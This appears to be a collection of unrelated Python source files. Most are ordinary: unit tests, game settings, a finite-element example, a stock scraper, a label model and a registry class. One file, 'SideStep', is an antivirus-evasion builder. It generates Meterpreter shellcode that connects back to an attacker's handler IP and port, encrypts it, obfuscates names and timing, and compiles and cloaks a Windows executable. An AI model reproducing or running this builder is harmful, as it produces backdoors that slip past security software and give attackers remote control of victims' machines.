return [path.splitext(t)[0] for t in listdir(path.abspath(template_dir))]
if __name__ == '__main__':
doxygen_templates_dir = path.join(script_path,'doxygen-templates')
doxygen_templates = get_doxygen_templates(doxygen_templates_dir)
args = parse_args(doxygen_templates)
result = generate_docs(doxygen_templates_dir, args)
if result:
print("Docset was successfully generated and installed!")
|
"""Tests for `otelib.strategies.dataresource`."""
from typing import TYPE_CHECKING
import pytest
if TYPE_CHECKING:
from typing import Callable, Union
from tests.conftest import OTEResponse, ResourceType
def test_create(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
) -> None:
"""Test `DataResource.create()`."""
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
data_resource = DataResource(server_url)
assert data_resource.id is None
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
assert data_resource.id
def test_create_fails(
mock_ote_response: "OTEResponse",
server_url: str,
) -> None:
"""Check `DataResource.create()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
status_code=500,
return_content=b"Internal Server Error",
)
data_resource = DataResource(server_url)
assert data_resource.id is None
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
session_id=123,
)
assert data_resource.id is None
def test_fetch(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Test `DataResource.fetch()`."""
import json
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
mock_ote_response(
method="get",
endpoint=f"/dataresource/{ids('dataresource')}",
return_json=testdata("dataresource"),
)
data_resource = DataResource(server_url)
# We must first create the resource - getting a resource ID
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
content = data_resource.fetch(session_id=None)
assert json.loads(content) == testdata("dataresource")
def test_fetch_fails(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
) -> None:
"""Check `DataResource.fetch()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
mock_ote_response(
method="get",
endpoint=f"/dataresource/{ids('dataresource')}",
status_code=500,
return_content=b"Internal Server Error",
)
data_resource = DataResource(server_url)
# We must first create the resource - getting a resource ID
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
data_resource.fetch(session_id=123)
def test_initialize(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
) -> None:
"""Test `DataResource.fetch()`."""
import json
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
mock_ote_response(
method="post",
endpoint=f"/dataresource/{ids('dataresource')}/initialize",
return_json={},
)
data_resource = DataResource(server_url)
# We must first create the resource - getting a resource ID
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
content = data_resource.initialize(session_id=None)
assert json.loads(content) == {}
def test_initialize_fails(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
) -> None:
"""Check `DataResource.fetch()` raises `ApiError` upon request failure."""
from otelib.exceptions import ApiError
from otelib.strategies.dataresource import DataResource
mock_ote_response(
method="post",
endpoint="/dataresource",
return_json={"resource_id": ids("dataresource")},
)
mock_ote_response(
method="post",
endpoint=f"/dataresource/{ids('dataresource')}/initialize",
status_code=500,
return_content=b"Internal Server Error",
)
data_resource = DataResource(server_url)
# We must first create the resource - getting a resource ID
data_resource.create(
downloadUrl="https://filesamples.com/samples/code/json/sample2.json",
mediaType="application/json",
)
with pytest.raises(ApiError, match="APIError"):
# `session_id` has a wrong type, the request should fail.
data_resource.initialize(session_id=123)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Wed Jan 24 22:53:14 2018
# (c) Alexander Veledzimovich
"""
Setting for 0_spacewar.py
"""
__version__ = 0.1
class Setting():
"""
Constants
"""
def __init__(self):
self.FPS = 30
self.WID = 1024
self.HEI = 768
self.SCRWID = self.WID // 2
self.SCRHEI = self.HEI // 2
self.DIST = 30
self.SCRRADIUS = self.SCRHEI - self.DIST
self.SCRBORDERSIZE = 20
self.BLACKBLUE = (0, 0, 35, 255)
self.GRAY = (128, 128, 128, 128)
self.WHITE = (255, 240, 240)
self.DARKCYAN = (0, 130, 155, 255)
self.LIGHTCYAN = (50, 110, 160, 255)
self.EMPTY = (255, 255, 255, 0)
self.APPNAME = 'Spacewar!'
self.TITLEFNT = ('fonts/pdp1.ttf', 80)
self.LABFNT = ('fonts/pdp1.ttf', 20)
self.BGCLR = self.BLACKBLUE
self.TXTCLR = self.DARKCYAN
self.GAMECLR = self.DARKCYAN
self.PDPCLR = self.LIGHTCYAN
self.FINALPAUSE = self.FPS * 3
self.SHIPPOS = {'needle': (self.SCRWID - self.SCRRADIUS + self.DIST,
self.SCRHEI),
'wedge': (self.SCRWID + self.SCRRADIUS - self.DIST,
self.SCRHEI)}
self.INITANGLE = {'needle': 1, 'wedge': 179, 'asteroid': 1}
self.FUEL = 256
self.SPEED_DT = 0.2
self.ROTATE_DT = 0.1
self.MAXSPEED = 6
self.MAXROTSPEED = 3
self.HYPERJUMP = 3
self.SHIPBOOM = 64
self.NUMTORPEDOS = 9
self.TORPEDASPEED = 0.6
self.TORPEDAMAXSPEED = 10
self.TORPEDADIST = 80
self.SUNRAD = 32
self.SUNGRAV = 0.0008
self.SUNGRAVRAD = 256
self.SUNDT = 1
self.STARS = 64
self.STARCLR = self.GRAY
self.STARSIZE = [2, 4]
self.INITASTER = 48
self.TIMETOBORN = 14
self.ASTDT = (-3, 4)
self.ASTSIZE = [4, 6, 8, 10, 12, 16, 18]
self.ASTMAKE = 16
self.ASTBOOM = 24
self.DOTSDT = (-1, 2)
def init_dynamic_settings(self):
pass
def reset_dynamic_settings(self):
pass
if __name__ == '__main__':
print(__version__)
print(__doc__)
print(__file__)
|
import difflib
import kaa
from kaa import document
from kaa.filetype.diff import diffmode
from kaa.filetype.default import keybind
from kaa.ui.dialog import dialogmode
class ViewDiffMode(dialogmode.DialogMode):
MODENAME = 'ViewDiff'
DOCUMENT_MODE = False
USE_UNDO = False
KEY_BINDS = [
keybind.cursor_keys,
keybind.edit_command_keys,
keybind.emacs_keys,
keybind.macro_command_keys,
]
tokenizer = diffmode.make_tokenizer()
callback = None
def init_keybind(self):
super().init_keybind()
self.register_keys(self.keybind, self.KEY_BINDS)
def init_themes(self):
super().init_themes()
self.themes.append(diffmode.DiffThemes)
def is_cursor_visible(self):
return 1 # hide cursor
def on_str(self, wnd, s, overwrite=False):
# does nothing
pass
def on_esc_pressed(self, wnd, event):
popup = wnd.get_label('popup')
if popup:
popup.destroy()
kaa.app.messagebar.set_message("")
if self.callback:
self.callback()
def view_doc_diff(curdoc, callback=None):
orig = kaa.app.storage.openfile(
curdoc.fileinfo.fullpathname,
curdoc.fileinfo.encoding,
curdoc.fileinfo.newline,
nohist=True)
org_lines = list(orig.iterlines(0))
orig.close()
cur_lines = list(curdoc.iterlines(0))
diff = ''.join(difflib.unified_diff(org_lines, cur_lines,
curdoc.fileinfo.fullpathname, '(buffer)'))
doc = document.Document()
doc.insert(0, diff)
mode = ViewDiffMode()
mode.callback = callback
doc.setmode(mode)
kaa.app.show_dialog(doc)
def show_diff(diff):
doc = document.Document()
doc.insert(0, diff)
mode = ViewDiffMode()
doc.setmode(mode)
kaa.app.show_dialog(doc)
|
"""
Name: SideStep
Version: 0.1.0
Date: 3/30/2015
Author: Josh Berry - josh.berry@codewatch.org
Github: https://github.com/codewatchorg/sidestep
Description: SideStep is yet another tool to bypass anti-virus software. The tool generates Metasploit payloads encrypted using the CryptoPP library (license included), and uses several other techniques to evade AV.
Software Requirements:
Metasploit Community 4.11.1 - Update 2015031001 (or later)
Ruby 2.x
Windows (7 or 8 should work)
Python 2.7.x
Visual Studio (free editions should be fine)
Cygwin with strip utility (if you want to strip debug symbols)
Configuration Requirements:
Ruby, Python, strip.exe (if using it), and the cl.exe tool from Visual Studio need to be in your path. Sorry, I tried to make it compile with ming-gcc with no luck.
I leveraged ideas from the following projects to help develop this tool:
- https://github.com/nccgroup/metasploitavevasion
- https://github.com/inquisb/shellcodeexec
"""
import argparse
import sys
import string
import subprocess
import os
import time
import re
from libs import rng
from libs import encryption
from libs import msfpayload
from libs import codesegments
def main(argv):
# Build argument list for running the script
parser = argparse.ArgumentParser(prog='sidestep.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Generate an executable to bypass DEP and AV protections',
epilog='Example: sidestep.py --file file.c --exe file.exe')
parser.add_argument('--file',
default='sidestep.cpp',
help='the file name in which the C code is placed')
parser.add_argument('--exe',
default='sidestep.exe',
help='the name of the final executable')
parser.add_argument('--ip',
required=True,
help='the IP on which the Metasploit handler is listening')
parser.add_argument('--port',
required=True,
help='the port on which the Metasploit handler is listening')
parser.set_defaults(file='sidestep.cpp', exe='sidestep.exe')
# Hold argument values in args
args = vars(parser.parse_args())
path_delim = ''
if 'posix' in os.name:
path_delim = '/'
else:
path_delim = '\\'
# Load configuration options
sys.path.append(os.getcwd() + path_delim + 'conf' + path_delim)
import settings
ip = args['ip']
port = args['port']
clOptions = '/GS /GL /analyze- /Zc:wchar_t /Zi /Gm /O2 /sdl /fp:precise /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oy- /Oi /MT /EHsc /Fe"' + settings.exeDir + path_delim + args['exe'] + '" /Fo"' + settings.exeDir + path_delim + args['exe'].split('.')[0] + '.obj " /Fd"' + settings.exeDir + path_delim + args['exe'].split('.')[0] + '" /nologo /I"' + settings.vsPath + path_delim + 'include" /I"' + settings.vsPath + path_delim + 'atlmfc' + path_delim + 'include" /I"' + settings.sdkPath + path_delim + 'Include" "' + settings.sdkPath + path_delim + 'Lib' + path_delim + 'AdvAPI32.Lib" "' + settings.sdkPath + path_delim + 'Lib' + path_delim + 'Uuid.Lib" "' + settings.sdkPath + path_delim + 'Lib' + path_delim + 'Kernel32.Lib" ' + settings.cryptLibPath + ' ' + settings.sourceDir + path_delim + args['file']
print '[+] Preparing to create a Meterpreter executable'
# Set the command line values
sourceFile = open(settings.sourceDir + path_delim + args['file'], 'w')
# Set DH parameter size
dhLen = 1024
if settings.dhSize == 2:
dhLen = 2048
execFuncVar = rng.genFunc(settings.randomFuncSize)
execParamVar = rng.genVar(settings.randomVarSize)
aesPayloadVar = rng.genVar(settings.randomVarSize)
virtAllocFuncVar = rng.genFunc(settings.randomFuncSize)
virtAllocFuncParam = rng.genVar(settings.randomVarSize)
encKey = rng.genKey(settings.encKeyLen)
encIv = rng.genIv(settings.encIvLen)
heuristicFuncVar = rng.genFunc(settings.randomFuncSize)
diffieFuncVar = rng.genFunc(settings.randomFuncSize)
diffieDh = rng.genVar(settings.randomVarSize)
diffieRnd = rng.genVar(settings.randomVarSize)
diffieBits = rng.genVar(settings.randomVarSize)
diffieCount = rng.genVar(settings.randomVarSize)
diffieP = rng.genVar(settings.randomVarSize)
diffieQ = rng.genVar(settings.randomVarSize)
diffieG = rng.genVar(settings.randomVarSize)
diffieV = rng.genVar(settings.randomVarSize)
diffieE = rng.genVar(settings.randomVarSize)
diffieMsg1 = rng.genData(settings.dataLen)
diffieMsg2 = rng.genData(settings.dataLen)
curTimeVar = rng.genVar(settings.randomVarSize)
print '[-]\tGenerating the Meterpreter shellcode'
clearPayload = msfpayload.payloadGenerator(settings.msfpath, settings.msfvenom, settings.msfmeterpreter, ip, port)
print '[-]\tEncrypting Meterpreter executable'
encPayload = encryption.aesCbc(settings.encKeyLen, settings.encIvLen, encKey, encIv, clearPayload)
# int main() vars
mainSt = rng.genVar(settings.randomVarSize)
mainDecrypted = rng.genVar(settings.randomVarSize)
mainEncodeKey = rng.genVar(settings.randomVarSize)
mainEncodeIv = rng.genVar(settings.randomVarSize)
mainDecodeCipher = rng.genVar(settings.randomVarSize)
mainFuncPayload = rng.genFunc(settings.randomFuncSize)
mainAesDecryption = rng.genVar(settings.randomVarSize)
mainCbcDecryption = rng.genVar(settings.randomVarSize)
mainStfDecryptor = rng.genVar(settings.randomVarSize)
# virtual allocation function for writing shellcode to memory and executing
virtAllocLen = rng.genVar(settings.randomVarSize)
virtAllocPid = rng.genVar(settings.randomVarSize)
virtAllocCode = rng.genVar(settings.randomVarSize)
virtAllocAddr = rng.genVar(settings.randomVarSize)
virtAllocPage_size = rng.genVar(settings.randomVarSize)
print '[-]\tGenerating the source code for the executable'
src = codesegments.cHeaders() + "\n"
src += codesegments.execHeaderStub(execFuncVar, execParamVar) + "\n"
src += "USING_NAMESPACE(CryptoPP)\n"
src += codesegments.randVarsAndData(settings.paddingVars, lambda: rng.genVar(settings.randomVarSize), lambda: rng.genData(settings.dataLen)) + "\n"
src += "std::string " + aesPayloadVar + " = \"" + encPayload + "\";\n"
src += "int " + virtAllocFuncVar + "(std::string " + virtAllocFuncParam + ");\n"
src += codesegments.delayTime(heuristicFuncVar, settings.heuristicTimerVar, settings.diffieDelay, diffieFuncVar, curTimeVar, diffieDh, dhLen, diffieRnd, diffieBits, diffieCount, diffieP, diffieQ, diffieG, diffieV, diffieE, diffieMsg1, diffieMsg2) + "\n"
src += codesegments.mainStub(mainSt, heuristicFuncVar, mainDecrypted, mainEncodeKey, encKey, mainEncodeIv, encIv, mainDecodeCipher, mainFuncPayload, aesPayloadVar, mainAesDecryption, mainCbcDecryption, mainStfDecryptor, virtAllocFuncVar) + "\n"
src += codesegments.virtualAllocStub(virtAllocFuncVar, virtAllocFuncParam, virtAllocLen, virtAllocPid, virtAllocCode, virtAllocAddr, virtAllocPage_size, execFuncVar, execParamVar) + "\n"
print '[-]\tWriting the source code to ' + settings.sourceDir + path_delim + args['file']
sourceFile.write(src)
sourceFile.close()
print '[-]\tCompiling the executable to ' + settings.exeDir + path_delim + args['exe']
subprocess.Popen('cl ' + clOptions, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
time.sleep(30)
if settings.useStrip == 1:
print '[-]\tStripping debugging symbols'
subprocess.Popen('strip.exe -s ' + settings.exeDir + path_delim + args['exe'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
time.sleep(5)
if settings.usePeCloak == 1:
print '[-]\tEncoding the PE file with peCloak'
subprocess.Popen('python ' + settings.peCloakPath + 'peCloak.py ' + os.getcwd() + path_delim + settings.exeDir + path_delim + args['exe'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
time.sleep(60)
os.remove(os.getcwd() + path_delim + settings.exeDir + path_delim + args['exe'])
for file in os.listdir(os.getcwd() + path_delim + settings.exeDir + path_delim):
if re.search('cloaked', file):
os.rename(os.getcwd() + path_delim + settings.exeDir + path_delim + file, os.getcwd() + path_delim + settings.exeDir + path_delim + args['exe'])
if __name__ == '__main__':
main(sys.argv[1:])
|
r"""
Laplace equation with Dirichlet boundary conditions given by a sine function
and constants.
Find :math:`t` such that:
.. math::
\int_{\Omega} c \nabla s \cdot \nabla t
= 0
\;, \quad \forall s \;.
The :class:`sfepy.discrete.fem.meshio.UserMeshIO` class is used to refine the
original two-element mesh before the actual solution.
The FE polynomial basis and the approximation order can be chosen on the
command-line. By default, the fifth order Lagrange polynomial space is used,
see ``define()`` arguments.
This example demonstrates how to visualize higher order approximations of the
continuous solution. The adaptive linearization is applied in order to save
viewable results, see both the options keyword and the ``post_process()``
function that computes the solution gradient. The linearization parameters can
also be specified on the command line.
The Lagrange or Bernstein polynomial bases support higher order
DOFs in the Dirichlet boundary conditions, unlike the hierarchical Lobatto
basis implementation, compare the results of::
python simple.py examples/diffusion/sinbc.py -d basis=lagrange
python simple.py examples/diffusion/sinbc.py -d basis=bernstein
python simple.py examples/diffusion/sinbc.py -d basis=lobatto
Use the following commands to view each of the results of the above commands
(assuming default output directory and names)::
python postproc.py -b -d't,plot_warp_scalar,rel_scaling=1' 2_4_2_refined_t.vtk --wireframe
python postproc.py -b 2_4_2_refined_grad.vtk
"""
from __future__ import absolute_import
import numpy as nm
from sfepy import data_dir
from sfepy.base.base import output
from sfepy.discrete.fem import Mesh, FEDomain
from sfepy.discrete.fem.meshio import UserMeshIO, MeshIO
from sfepy.homogenization.utils import define_box_regions
from six.moves import range
base_mesh = data_dir + '/meshes/elements/2_4_2.mesh'
def mesh_hook(mesh, mode):
"""
Load and refine a mesh here.
"""
if mode == 'read':
mesh = Mesh.from_file(base_mesh)
domain = FEDomain(mesh.name, mesh)
for ii in range(3):
output('refine %d...' % ii)
domain = domain.refine()
output('... %d nodes %d elements'
% (domain.shape.n_nod, domain.shape.n_el))
domain.mesh.name = '2_4_2_refined'
return domain.mesh
elif mode == 'write':
pass
def post_process(out, pb, state, extend=False):
"""
Calculate gradient of the solution.
"""
from sfepy.discrete.fem.fields_base import create_expression_output
aux = create_expression_output('ev_grad.ie.Elements( t )',
'grad', 'temperature',
pb.fields, pb.get_materials(),
pb.get_variables(), functions=pb.functions,
mode='qp', verbose=False,
min_level=0, max_level=5, eps=1e-3)
out.update(aux)
return out
def define(order=5, basis='lagrange', min_level=0, max_level=5, eps=1e-3):
filename_mesh = UserMeshIO(mesh_hook)
# Get the mesh bounding box.
io = MeshIO.any_from_filename(base_mesh)
bbox, dim = io.read_bounding_box(ret_dim=True)
options = {
'nls' : 'newton',
'ls' : 'ls',
'post_process_hook' : 'post_process',
'linearization' : {
'kind' : 'adaptive',
'min_level' : min_level, # Min. refinement level applied everywhere.
'max_level' : max_level, # Max. refinement level.
'eps' : eps, # Relative error tolerance.
},
}
materials = {
'coef' : ({'val' : 1.0},),
}
regions = {
'Omega' : 'all',
}
regions.update(define_box_regions(dim, bbox[0], bbox[1], 1e-5))
fields = {
'temperature' : ('real', 1, 'Omega', order, 'H1', basis),
}
variables = {
't' : ('unknown field', 'temperature', 0),
's' : ('test field', 'temperature', 't'),
}
amplitude = 1.0
def ebc_sin(ts, coor, **kwargs):
x0 = 0.5 * (coor[:, 1].min() + coor[:, 1].max())
val = amplitude * nm.sin( (coor[:, 1] - x0) * 2. * nm.pi )
return val
ebcs = {
't1' : ('Left', {'t.0' : 'ebc_sin'}),
't2' : ('Right', {'t.0' : -0.5}),
't3' : ('Top', {'t.0' : 1.0}),
}
functions = {
'ebc_sin' : (ebc_sin,),
}
equations = {
'Temperature' : """dw_laplace.10.Omega(coef.val, s, t) = 0"""
}
solvers = {
'ls' : ('ls.scipy_direct', {}),
'newton' : ('nls.newton', {
'i_max' : 1,
'eps_a' : 1e-10,
}),
}
return locals()
|
# eastmoney stock crawler
# tools browser Developer Tools
import requests
def getHTMLText(url,headers):
try:
r = requests.get(url,headers=headers,timeout=30)
r.raise_for_status()
r.encoding = r.apparent_encoding
return r.json()
except:
return "123"
if __name__ == "__main__":
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36 Edg/83.0.461.1'
}
url = 'http://dcfm.eastmoney.com/em_mutisvcexpandinterface/api/js/get?type=QGQP_LB&token=70f12f2f4f091e459a279469fe49eca5'
html = getHTMLText(url,headers)
print(type(html))
result_list=[]
for data_dict in html:
temp={}
temp['Code']=data_dict['Code']
temp['Name']=data_dict['Name']
temp['JGCYDType']=data_dict['JGCYDType']
temp['ChangePercent']=data_dict['ChangePercent']
result_list.append(temp)
print (result_list)
|
# ----------------------------------------------------------------------
# RegexLabel model
# ----------------------------------------------------------------------
# Copyright (C) 2007-2021 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
from typing import Optional, List, Iterable
from threading import Lock
import re
import logging
import operator
# Third-party modules
from mongoengine.document import Document
from mongoengine.fields import StringField, BooleanField, ListField
from pymongo import UpdateMany
import cachetools
# from bson.regex import Regex
# NOC modules
from noc.core.model.decorator import on_save, on_delete
from noc.main.models.label import Label
id_lock = Lock()
re_lock = Lock()
logger = logging.getLogger(__name__)
@on_save
@on_delete
@Label.match_labels(category="rxfilter", allowed_op={"="})
class RegexpLabel(Document):
meta = {
"collection": "regexlabels",
"strict": False,
"auto_create_index": False,
}
name = StringField(unique=True)
description = StringField()
# Regular Expresion
regexp = StringField(required=True)
regexp_compiled = StringField(required=False)
# Set Multiline flag
flag_multiline = BooleanField(default=False)
# Set DotAll flag
flag_dotall = BooleanField(default=False)
# Set labels if match regex
labels = ListField(StringField())
# Allow apply for ManagedObject
enable_managedobject_name = BooleanField(default=False)
enable_managedobject_address = BooleanField(default=False)
enable_managedobject_description = BooleanField(default=False)
# Allow apply for Interface
enable_interface_name = BooleanField(default=False)
enable_interface_description = BooleanField(default=False)
# Allow apply for Interface
enable_sensor_local_id = BooleanField(default=False)
# Caches
_name_cache = cachetools.TTLCache(maxsize=1000, ttl=60)
_re_cache = {}
@classmethod
@cachetools.cachedmethod(operator.attrgetter("_name_cache"), lock=lambda _: id_lock)
def get_by_name(cls, name: str) -> Optional["Label"]:
return Label.objects.filter(name=name).first()
@cachetools.cachedmethod(operator.attrgetter("_re_cache"), lock=lambda _: re_lock)
def _get_re(self, pattern: str) -> Optional[re.Pattern]:
try:
rx = re.compile(pattern)
except re.error:
return None
if self.flag_multiline:
rx.flags ^= re.MULTILINE
if self.flag_dotall:
rx.flags ^= re.DOTALL
return rx
@classmethod
def get_effective_labels(cls, scope: str, value: str) -> List[str]:
"""
:param: scope - check `enable_<scope>` for filter enable regex
:param: value - string value for check
"""
labels = []
for rx in RegexpLabel.objects.filter(**{f"enable_{scope}": True}):
if rx._get_re(rx.regexp).match(value):
labels += [f"noc::rxfilter::{rx.name}::="] + (rx.labels or [])
return labels
# def clean(self):
# rx = Regex.from_native(self.regexp)
# rx.flags ^= re.UNICODE
# self.regexp_compiled = rx
def iter_models_fields(self) -> Iterable[str]:
"""
Yields all scopes
:return:
"""
if self.enable_managedobject_name:
yield "sa.ManagedObject", "name"
if self.enable_managedobject_address:
yield "sa.ManagedObject", "address"
if self.enable_managedobject_description:
yield "sa.ManagedObject", "description"
if self.enable_interface_name:
yield "inv.Interface", "name"
if self.enable_interface_description:
yield "inv.Interface", "description"
if self.enable_sensor_local_id:
yield "inv.Sensor", "local_id"
# def get_labels(self, scope: str = None) -> List[str]:
# r = self.labels or []
# for scp in self.iter_scopes():
# if (scope and scp != scope) or not getattr(self, f"enable_{scp}", False):
# continue
# r += [f"noc::rxfilter::{self.name}::{scp}::="]
# return r
def on_save(self):
"""
Sync field changes to model
For scope change:
* Remove label from model
For Regex change:
* Update labels set for regex
For labels change:
* Sync label for change
:return:
"""
if not hasattr(self, "_changed_fields"):
return
# print(self._old_values)
# Refresh regex
if (
"regexp" in self._changed_fields
or "flag_multiline" in self._changed_fields
or "flag_dotall" in self._changed_fields
):
logger.info("[%s] Regex field change. Refresh labels", self.name)
self._reset_caches()
self._refresh_labels()
def _refresh_labels(self):
"""
Recalculate labels on model
:return:
"""
from django.db import connection
from noc.models import get_model, is_document
labels = [f"noc::rxfilter::{self.name}::="] + (self.labels or [])
for model_id, field in self.iter_models_fields():
model = get_model(model_id)
if is_document(model):
# Cleanup current labels
logger.info("[%s] Cleanup Interface effective labels: %s", self.name, labels)
Label.reset_model_labels(model_id, labels)
# Apply new rule
coll = model._get_collection()
coll.bulk_write(
[
UpdateMany(
{field: {"$regex": self.regexp}},
{"$addToSet": {"effective_labels": {"$each": labels}}},
)
]
)
else:
# Cleanup current labels
logger.info("[%s] Cleanup ManagedObject effective labels: %s", self.name, labels)
Label.reset_model_labels(model_id, labels)
# Apply new rule
logger.info("[%s] Apply new regex '%s' labels", self.name, self.regexp)
sql = f"""
UPDATE {model._meta.db_table}
SET effective_labels=ARRAY (
SELECT DISTINCT e FROM unnest(effective_labels || %s::varchar[]) AS a(e)
)
WHERE {field} ~ %s
"""
cursor = connection.cursor()
cursor.execute(sql, [labels, self.regexp])
def _reset_caches(self):
try:
del self._re_cache[self.regexp]
except KeyError:
pass
|
"""Tests for groove selection widget."""
import pytest
import weldx
from weldx.welding.groove.iso_9692_1 import _create_test_grooves
from weldx_widgets import WidgetGrooveSelection, WidgetGrooveSelectionTCPMovement
test_grooves = _create_test_grooves()
@pytest.mark.parametrize("groove_name", test_grooves.keys())
def test_groove_sel(groove_name):
"""Check form restoration from test grooves."""
groove_obj = test_grooves[groove_name][0]
w = WidgetGrooveSelection()
w.groove_obj = groove_obj
tree = w.to_tree()
gui_params = w.groove_params_dropdowns
if not groove_name.startswith("ff"): # non ff-grooves
assert gui_params["workpiece_thickness"].quantity == groove_obj.t
assert gui_params["root_gap"].quantity == groove_obj.b
try:
assert gui_params["root_face"].quantity == groove_obj.c
except AttributeError:
pass
try:
assert gui_params["groove_angle"].quantity == groove_obj.alpha
except AttributeError:
pass
else:
assert gui_params["workpiece_thickness"].quantity == groove_obj.t_1
w2 = WidgetGrooveSelection()
w2.from_tree(tree)
tree2 = w2.to_tree()
assert tree2 == tree
def test_groove_linear_sel_tcp_movement_export():
"""Test export."""
w = WidgetGrooveSelectionTCPMovement()
w.create_csm_and_plot()
w.geometry_export.create_btn.click() # simulate an geometry export with defaults.
tree = w.to_tree()
# dump
tree = weldx.WeldxFile(tree=tree, mode="rw")
tree.pop("asdf_library")
tree.pop("history")
w2 = WidgetGrooveSelectionTCPMovement()
w2.from_tree(tree)
tree2 = w2.to_tree()
assert tree2 == tree
|
# coding=utf-8
"""Source registry.
This module provides a unique mixin _SourceFileRegistry to be
included in the Megamodel class.
"""
from collections import OrderedDict
from typing import List, Dict, Optional, ClassVar
from modelscript.base.exceptions import (
NotFound)
DEBUG = 0
Metamodel = 'Metamodel'
MetamodelDependency = 'MetamodelDependency'
Model = 'Model'
ModelDependency = 'ModelDependency'
ModelSourceFile = 'ModelOldSourceFile'
SourceFileDependency = 'SourceFileDependency'
__all__ = (
'_SourceFileRegistry'
)
class _SourceFileRegistry(object):
""" Part of the megamodel dealing with source files. """
_allSourceFiles: \
ClassVar[List[ModelSourceFile]] \
= []
_sourceFileByPath: \
ClassVar[Dict[Metamodel, ModelSourceFile]] \
= OrderedDict()
_sourceFilesByMetamodel: \
ClassVar[Dict[Metamodel, List[ModelSourceFile]]] \
= OrderedDict()
_allSourceFileDependencies:\
ClassVar[List[SourceFileDependency]] \
= []
_sourceFileDependenciesBySource:\
ClassVar[Dict[Metamodel, List[SourceFileDependency]]] \
= OrderedDict()
_sourceFileDependenciesByTarget: \
ClassVar[Dict[Metamodel, List[SourceFileDependency]]] \
= {}
# --------------------------------------------------
# Registering sources and dependencies
# --------------------------------------------------
@classmethod
def registerSourceFile(cls, source: ModelSourceFile) -> None:
""" Register a source. Register the corresponding model as well.
"""
if DEBUG >= 1:
print(('RSC: registerSourceFile(%s)' % source.fileName))
if source.path not in cls._sourceFileByPath:
cls._allSourceFiles.append(source)
# ByPath
metamodel = source.metamodel
cls._sourceFileByPath[source.path] = source
# ByMetamodel
if metamodel not in cls._sourceFilesByMetamodel:
cls._sourceFilesByMetamodel[metamodel] = []
if source not in cls._sourceFilesByMetamodel[metamodel]:
cls._sourceFilesByMetamodel[metamodel].append(source)
# Register model
if source.model is not None:
from modelscript.megamodels import Megamodel
Megamodel.registerModel(source.model)
@classmethod
def registerSourceFileDependency(
cls,
sourceDependency: SourceFileDependency) -> None:
""" Register a source file dependency.
Register before the source and target if not done before.
Also register the model dependency if needed.
"""
source = sourceDependency.source
target = sourceDependency.target
# Element registration
cls.registerSourceFile(source)
cls.registerSourceFile(target)
from modelscript.megamodels import Megamodel
Megamodel.registerModel(source.model)
Megamodel.registerModel(target.model)
cls._allSourceFileDependencies.append(sourceDependency)
# BySource
if source not in cls._sourceFileDependenciesBySource:
cls._sourceFileDependenciesBySource[source] = []
cls._sourceFileDependenciesBySource[source].append(sourceDependency)
# ByTarget
if target not in cls._sourceFileDependenciesByTarget:
cls._sourceFileDependenciesByTarget[target] = []
cls._sourceFileDependenciesByTarget[target].append(sourceDependency)
# Model dependency creation is done in constructor
# of SourceFileDependency. Nothing to do here.
# --------------------------------------------------
# Retrieving information from the megamodel
# --------------------------------------------------
@classmethod
# The name sourceFile instead of source is due to a conflict
# with the method sources() (with "sources" and "targets"()) in the
# MegamodelElement class.
def sourceFiles(cls,
metamodel: Optional[Metamodel] = None)\
-> List[ModelSourceFile]:
"""Return all source files for a given metamodel.
If no metamodel is provided, then return all sources.
"""
if metamodel is None:
return cls._allSourceFiles
else:
return cls._sourceFilesByMetamodel[metamodel]
@classmethod
def sourceFile(cls, path: str) -> Metamodel:
"""Return a source given its path.
If the path does not corresponds to this file then
raise NotFound.
"""
if path in cls._sourceFileByPath:
return cls._sourceFileByPath[path]
else:
raise NotFound( # raise:ok
'No source at "%s"' % path)
@classmethod
def _outSourceDependencies(
cls,
source: ModelSourceFile) \
-> List[SourceFileDependency]:
"""Dependencies from source or None """
if source not in cls._sourceFileDependenciesBySource:
return []
else:
return cls._sourceFileDependenciesBySource[source]
@classmethod
def _inSourceDependencies(
cls,
target: ModelSourceFile)\
